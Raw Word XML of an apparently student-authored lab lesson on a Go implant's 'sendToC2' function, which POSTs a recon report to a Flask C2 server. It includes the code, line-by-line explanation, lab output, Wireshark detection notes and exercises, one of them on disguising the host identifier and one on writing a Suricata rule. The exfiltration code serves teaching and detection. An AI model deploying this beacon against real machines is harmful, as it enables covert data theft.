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SETU Cybercrime &amp; IT Security — Final Year Project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L06 — HTTP Exfiltration from the Go Payload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2E6DA4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sendToC2() — POST request construction, headers, timeout, response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="6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C2 — L06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 — C2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T1041 — Exfiltration Over C2 Channel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Student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Jake Powell Langstaff — C00287662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1. The sendToC2 Function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This function handles everything on the sending side: reads the recon file, builds an HTTP POST request with the custom headers Flask expects, sends it with a timeout, and reads the response. It is designed to fail silently — if the C2 is unreachable the function returns and the beacon loop continues.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2"/>
              <w:left w:val="single" w:color="444444" w:sz="2"/>
              <w:bottom w:val="single" w:color="444444" w:sz="2"/>
              <w:right w:val="single" w:color="444444" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="0d111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 sendToC2(url, filepath, hostID, filename string)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data, err := os.ReadFile(filepath)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err != nil { return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5c6370"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    // bytes.NewReader wraps byte slice as io.Reader — no copy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req, err := http.NewRequest("POST", url, bytes.NewReader(data))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err != nil { return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5c6370"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    // Three custom headers Flask reads on the other side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req.Header.Set("Content-Type", "application/octet-stream")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req.Header.Set("X-Filename", filename)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req.Header.Set("X-Host", hostID)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i/>
                <w:iCs/>
                <w:color w:val="5c6370"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    // Timeout prevents hanging if C2 is unreachable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client := &amp;http.Client{Timeout: 10 * time.Second}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resp, err := client.Do(req)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err != nil { return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defer resp.Body.Close()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body, _ := io.ReadAll(resp.Body)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fmt.Printf("C2 Response [%d]: %s\n", resp.StatusCode, string(body))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2. How Each Part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http.NewRequest: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Creates the request object — does not send anything. Takes method, URL, and body as io.Reader. The body is the entire recon file as a byte stream.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bytes.NewReader: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Wraps the existing byte slice as an io.Reader without making a copy. Memory-efficient for potentially large recon reports.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 headers: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type tells Flask this is raw binary data. X-Filename and X-Host carry metadata used by Flask to construct the output filename. These are non-standard X- headers — visible in Wireshark in plaintext.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client.Do(req): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sends the request. Blocks until a response arrives or the 10-second timeout fires.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defer resp.Body.Close(): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scheduled to run when the function returns regardless of how it exits. Without this, connections stay open and the OS eventually runs out of file descriptors.</w:t>
      </w:r>
    </w:p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3. What Both Sides See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console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C2 Response [200]: {"saved_as":"HOSTNAME_...","size_bytes":4821,"status":"ok"}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Operator console (Flask)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127.0.0.1 - - [15/Mar/2024] "POST /beacon HTTP/1.1" 200 -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uploads/ folder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file: DESKTOP-ABC123_20240315_140000_recon_combined.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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4. Detection Visibility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Run Wireshark on the operator machine with filter tcp.port == 5000. Click any POST packet and expand Hypertext Transfer Protocol. You can read the X-Host and X-Filename headers in plaintext and see the recon data in the packet body. This is why plain HTTP is a significant detection risk — follow TCP Stream in Wireshark to see the complete exfiltrated report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="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6DA4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5. Exercises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Run v5_jitter.exe on the target VM. In Wireshark on the operator machine, apply filter http.request.method == "POST". Follow the TCP stream of one beacon. What does the exfiltrated report contain?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Change the Timeout from 10 to 3 seconds. What happens if the C2 server is slow to respond? How does this affect the beacon loop?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X-Host header currently sends os.Hostname(). Change it to send a random 8-character hex string instead. What impact does this have on VirusTotal analysis? What impact does it have on your Flask uploads folder?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Write a Suricata rule that matches POST requests containing both X-Host and X-Filename headers. What would the rule file look like? Research the Suricata HTTP keyword documentation.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2026-03-31T22:16:36.846Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-31T22:16:36.846Z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